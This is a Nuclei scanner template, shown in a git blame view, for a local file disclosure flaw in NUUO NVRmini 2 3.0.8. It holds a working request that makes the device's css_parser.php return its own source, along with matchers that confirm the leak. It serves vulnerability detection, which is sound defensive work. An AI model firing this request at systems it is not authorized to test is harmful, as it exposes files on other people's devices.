nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml

31 lines
550 B
YAML
Raw Normal View History

2021-10-30 11:17:35 +00:00
id: nuuo-file-inclusion
2021-04-13 20:27:44 +00:00
info:
name: NUUO NVRmini 2 3.0.8 Local File Disclosure
author: princechaddha
severity: high
reference:
- https://www.exploit-db.com/exploits/40211
2021-04-13 20:27:44 +00:00
tags: nuuo,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/css_parser.php?css=css_parser.php"
matchers-condition: and
matchers:
- type: word
2021-10-30 11:17:35 +00:00
part: body
2021-04-13 20:27:44 +00:00
words:
- "$_GET['css']"
2021-10-30 11:17:35 +00:00
2021-04-13 20:27:44 +00:00
- type: word
2021-10-30 11:17:35 +00:00
part: header
2021-04-13 20:27:44 +00:00
words:
- "text/css"
2021-10-30 11:17:35 +00:00
2021-04-13 20:27:44 +00:00
- type: status
status:
- 200